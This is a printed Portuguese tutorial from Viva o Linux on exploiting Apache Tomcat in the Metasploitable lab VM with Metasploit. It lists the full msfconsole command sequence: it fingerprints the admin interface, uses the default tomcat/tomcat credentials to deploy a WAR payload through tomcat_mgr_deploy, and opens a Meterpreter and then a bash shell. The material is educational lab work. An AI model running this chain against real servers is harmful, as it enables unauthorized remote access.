Atirando o pau no gato com Metasploit [Artigo]

http://www.vivaolinux.com.br/artigos/impressora.php?codigo=13236

Atirando o pau no gato com Metasploit

Autor: Bruno Rocha da Silva <brunorocha.s.br at gmail.com> Data: 05/01/2012 Introduo e Levantamento de informaes

Introduo
De acordo com o diretor de segurana (CSO) da Rapid7 e criador do Metasploit Project, HD Moore: "A melhor maneira de lidar com os crescentes desafios de segurana de informao compartilhar conhecimento entre profissionais, projetos em cdigo aberto e fornecedores comerciais." Para que esta analogia no ficasse apenas em teoria, os prprios desenvolvedores do Metasploit criaram o projeto Metasploitable, uma mquina virtual com diversos softwares vulnerveis, como o TikiWiki, SSH, MySql, entre outros. Reiterando, o artigo foi criado para fins ticos, e tem a funo de demonstrar (para aqueles que esto iniciando) um pedao do "poder de fogo" do Metasploit Framework. Para tal, iremos explorar vulnerabilidades na aplicao Tomcat (servidor de aplicaes JEE) presente no Metasploitable. O Cenrio: VirtualBox; Backtrack 5; Metasploitable (Download via torrent: http://updates.metasploit.com - Metasploitable). Obs.1: Para "rodar" o Metasploitable (que est em VMDK) no VirtualBox, basta entrar na opo 'Sistema', e habilitar a opo 'IO APIC'. Obs.2: Os testes sero realizados visando a agregao de conhecimento em uma falha j existente, e no a explorao de uma falha '0day'.

Levantando informaes
Para que tenhamos xito na identificao e explorao da vulnerabilidade, o primeiro passo ser atualizar o Metasploit: # msfupdate

1 de 4

1/1/2003 19:05

Atirando o pau no gato com Metasploit [Artigo]

http://www.vivaolinux.com.br/artigos/impressora.php?codigo=13236

Feito isto, iniciaremos o Metasploit no modo console (linha de comando): # msfconsole Com o Metasploit iniciado, iremos procurar e utilizar algum mdulo auxiliar que se responsabilize pelo fingerprint da aplicao: msf > search tomcat Sada do comando: auxiliary/admin/http/tomcat_administration normal Tomcat Administration Tool Default Access (Este mdulo utilizado para detectar informaes na interface de administrao do Tomcat.) msf > use auxiliary/admin/http/tomcat_administration Quais opes este mdulo auxiliar oferece? Simples, basta utilizar o comando 'show options': msf auxiliary(tomcat_administration) > show options Perceba que as opes requeridas j esto habilitadas por padro, exceto a opo RHOTS, que indica o IP da mquina que hospeda o Tomcat (192.168.200.66). Vamos setar esta opo: msf auxiliary(tomcat_administration) > set RHOSTS 192.168.200.66 Feito isto, basta executar o mdulo: msf auxiliary(tomcat_administration) > run Sada do comando: [*] http://192.168.200.66:8180/admin [Apache-Coyote/1.1] [Apache Tomcat/5.5] [Tomcat Server Administration] [tomcat/tomcat] [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed Analisando a sada do comando, percebemos que o Tomcat est "rodando" na porta 8180, e no fim da mesma linha entre colchetes "[ ]", informa o usurio e senha da interface administrativa; informao no qual, vai ser de grande utilidade em meio explorao! Explorando o Tomcat Com a parte de 'fingerprint' concluda, hora de procurarmos um Exploit: msf auxiliary(tomcat_mgr_login) > back msf > search tomcat Perceba que existe apenas um Exploit para explorar o Tomcat (o restante so mdulos auxiliares), conseguimos mais informaes deste Exploit com o comando:

2 de 4

1/1/2003 19:05

Atirando o pau no gato com Metasploit [Artigo]

http://www.vivaolinux.com.br/artigos/impressora.php?codigo=13236

msf > info exploit/multi/http/tomcat_mgr_deploy Perceba que a funo do Exploit injetar um Payload no 'Apache / Tomcat' a fim de obter acesso aplicao. msf > use exploit/multi/http/tomcat_mgr_deploy msf exploit(tomcat_mgr_deploy) > show options Com as opes listadas, necessrio setar algumas delas, como USERNAME, PASSWORD, RHOST e RPORT: msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.200.66 msf exploit(tomcat_mgr_deploy) > set RPORT 8180

Encontrando um Payload
Agora necessrio encontrar um Payload para mantermos acesso ao sistema que hospeda a aplicao. Neste caso, atravs de uma shell: msf exploit(tomcat_mgr_deploy) > show payloads O comando 'show payloads', demonstra quais so os Payloads que podemos utilizar com esse Exploit. Nesse caso, utilizarei o Payload 'java/meterpreter/bind_tcp', que tem a funo de fornecer um 'Shell Meterpreter' ao atacante: msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/bind_tcp Feito isto, basta executar o comando 'exploit', e aguardar o shell meterpreter: msf exploit(tomcat_mgr_deploy) > exploit Sada do comando: [*] Started bind handler [*] Attempting to automatically select a target... [*] Automatically selected target "Linux x86" [*] Uploading 6219 bytes as yA3qxprcUAWuRo1mgLlruBue.war... [*] Executing /yA3qxprcUAWuRo1mgLlruBue/fwPtbEiJ611zikx4AkQ0u5ddQs.jsp... [*] Undeploying yA3qxprcUAWuRo1mgLlruBue... [*] Sending stage (28469 bytes) to 192.168.200.66 [*] Meterpreter session 1 opened (192.168.200.3:59842 -> 192.168.200.66:4444) at 2011-12-29 13:24:00 -0200 meterpreter > E ... VOIL !! Conseguimos acesso ao sistema. Para saber quais comandos executar no Meterpreter, utilize o comando

3 de 4

1/1/2003 19:05

Atirando o pau no gato com Metasploit [Artigo]

http://www.vivaolinux.com.br/artigos/impressora.php?codigo=13236

'help': meterpreter > help Caso no se familiarize com o 'Shell Meterpreter', basta utilizar o comando 'shell', que o mesmo passar a ser o shell do sistema atacado, no nosso caso, o Bash. meterpreter > shell Espero que tenham gostado. At a prxima!

http://www.vivaolinux.com.br/artigo/Atirando-o-pau-no-gato-com-Metasploit Voltar para o site

4 de 4

1/1/2003 19:05